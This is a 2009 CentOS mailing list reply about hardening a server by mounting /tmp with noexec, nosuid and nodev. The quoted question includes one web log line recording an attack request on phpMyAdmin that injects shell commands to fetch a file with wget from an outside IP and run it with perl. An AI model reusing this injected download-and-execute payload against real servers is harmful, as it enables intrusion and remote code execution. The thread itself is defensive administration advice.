On Mon, Aug 24, 2009 at 2:04 PM, Chuck<chuck.carson at gmail.com> wrote: > > Does mounting /tmp as noexec,nosuid break anything in CentOS 5? I've been in > solaris land forever and a day and this is a pretty standard security > measure. I noticed CentOS comes default mounting /tmp with both those > options allowed.. I'm getting constant php hack attacks against (mostly > script kiddie level stuff right now) my server and will rest much easier > with this setting in place.. We've been evaluating numerous wiki products > which are certain to have security holes as well as pypmyadmin... Seeing a > lot of crap like this: > > 193.253.240.85 - - [23/Aug/2009:16:57:57 -0500] "GET > /phpmyadmin/config/config.inc.php?c=cd%20/tmp;rm%20-rf%20font-nix;wget%2078.46.33.52/font-nix;perl%20font-nix > HTTP/1.1" 404 230 > > (of course I use cryptic names for my phpmyadmin install directory as well > as password protect the directory and make any sensitive config files > readable only by the web server owner) > > Thx for any info > rhugga > > > _______________________________________________ > CentOS mailing list > CentOS at centos.org > http://lists.centos.org/mailman/listinfo/centos > > I've been doing this for a lot of time without issues. noexec,nosuid,nodev ftw! :)